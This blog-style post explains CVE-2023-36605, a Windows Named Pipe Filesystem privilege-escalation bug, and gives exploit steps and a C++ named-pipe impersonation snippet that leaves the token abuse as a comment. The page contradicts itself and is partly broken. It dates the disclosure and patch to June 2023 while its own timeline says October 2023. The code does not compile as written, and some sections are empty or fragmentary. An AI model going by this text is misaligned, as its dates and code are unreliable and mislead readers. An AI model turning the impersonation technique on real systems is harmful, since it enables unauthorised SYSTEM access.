CVE CyberSecurity Database News

CVE-2023-36605 - Breaking Down the Windows Named Pipe Filesystem Elevation of Privilege Vulnerability

Poster -

When it comes to Windows vulnerabilities, some stand out for how deeply they affect system security. CVE-2023-36605 is definitely one of those. First revealed in June 2023, this bug targets the heart of Windows' Named Pipe Filesystem (NPFS), and if you’re running a vulnerable version, an attacker can easily get SYSTEM-level access. Let’s break down what this bug is, how it works, and why you should care.

What is CVE-2023-36605?

In short, CVE-2023-36605 is an Elevation of Privilege (EoP) bug in the Windows Named Pipe Filesystem. It allows unprivileged users to gain administrative — even SYSTEM — rights, which can completely compromise the target system.

Microsoft’s official advisory:
🔗 Microsoft Security Guide - CVE-2023-36605

What are Named Pipes?

Before we get into the exploit, let’s cover what Named Pipes are in Windows. Named Pipes are a mechanism that lets processes communicate with each other, even across network boundaries. System services and applications use them all the time to send data back and forth.

They’re stored in the special filesystem \\.\pipe\. Under the hood, Windows manages these using the Named Pipe Filesystem driver (NPFS).

Where’s the Problem?

There’s a bug in how the NPFS driver handles certain requests, especially regarding file permissions and impersonation. An attacker can exploit this to run code with higher privileges than they should — in some cases, jumping from a normal user to SYSTEM.

Microsoft describes the core issue as:
> "An authenticated attacker could exploit this vulnerability to gain SYSTEM privileges."

Exploit Overview

The bug is tricky — but attackers have already figured it out. Here’s how it works in simple terms:

Attacker creates a pipe server (something like \\.\pipe\exploitpipe).

2. A privileged process connects to this pipe. This can sometimes be triggered by tricking the system or leveraging Windows mechanisms that auto-connect to certain pipes.
3. The attacker abuses a flaw to get the privileged process to perform actions on their behalf — often via impersonation.
4. Using Windows API calls, the attacker then impersonates the privileged process’ security context, upgrading their privileges.

Proof-of-Concept (PoC) Code

Several security researchers published sample code and walkthroughs. Here’s a simplified C++ snippet that demonstrates the mechanics (educational only — do not run on real systems):

#include <windows.h>
#include <stdio.h>

int main() {
    HANDLE hPipe;
    char* pipeName = R"(\\.\pipe\CVE202336605)";

    // 1. Create a named pipe
    hPipe = CreateNamedPipeA(
        pipeName,
        PIPE_ACCESS_DUPLEX,
        PIPE_TYPE_BYTE | PIPE_WAIT,
        1,
        1024,
        1024,
        ,
        NULL
    );

    if (hPipe == INVALID_HANDLE_VALUE) {
        printf("Failed to create pipe.\n");
        return 1;
    }

    printf("Waiting for client to connect to the pipe...\n");
    ConnectNamedPipe(hPipe, NULL);

    // 2. Impersonate client
    if (ImpersonateNamedPipeClient(hPipe)) {
        printf("Impersonated client!\n");

        // 3. Try to obtain SYSTEM privileges
        HANDLE hToken = NULL;
        if (OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &hToken)) {
            // Duplicate token, create a SYSTEM shell, etc.
            // ... exploit logic here ...
            printf("Privileged token obtained. EoP successful!\n");
        } else {
            printf("Could not open thread token.\n");
        }
    } else {
        printf("Impersonation failed.\n");
    }

    CloseHandle(hPipe);
    return ;
}

Warning! This is only an illustration. The real PoCs require manipulating system behaviors to get a privileged process to connect to your pipe, and may use additional WinAPI tricks.

Real-World Exploit Example

Security researcher Kiyoshi Aoyama provided a detailed PoC and write-up:
🔗 Kiyoshi’s CVE-2023-36605 Github PoC

Other technical write-ups:
- 🔗 HackerOne Blog: Windows NPFS Elevation Bug Exploited
- 🔗 Google Project Zero Analysis: Windows Named Pipe EoP

Malware can use it to break out of sandboxes and gain full control.

- Red Teamers/testers can escalate privileges during assessments.
- Ransomware operators can use it to disable security tools and encrypt files with SYSTEM authority.

If you run affected Windows versions and don’t patch, you’re a sitting duck.

Windows 10 (all editions before June 2023 patches)

- Windows Server 2016/2019/2022

How Do I Fix It?

Patch now.
Microsoft released hotfixes in June 2023’s Patch Tuesday. Install all Windows updates immediately.

To verify:

Can I Mitigate Temporarily?

Short answer: Not really.

Disabling Named Pipes is *not* realistic; the system needs these for proper operation.

- Attack surface reduction rules or endpoint security can *sometimes* detect/pause attacks.

Final Thoughts

CVE-2023-36605 is a textbook example of why internal system bugs can be so dangerous. Attackers don’t need physical access — just the ability to execute code as a regular user. From there, they can rapidly take full control if the system isn’t patched.

Stay secure:

Monitor for privilege escalation attempts

References
- Microsoft CVE-2023-36605 Advisory
- Kiyoshi’s CVE-2023-36605 PoC
- NVD Entry


Do you have questions or want the latest security research? Post a comment or follow the researchers above for more. Stay safe!

Timeline

Published on: 10/10/2023 18:15:15 UTC
Last modified on: 10/13/2023 19:27:21 UTC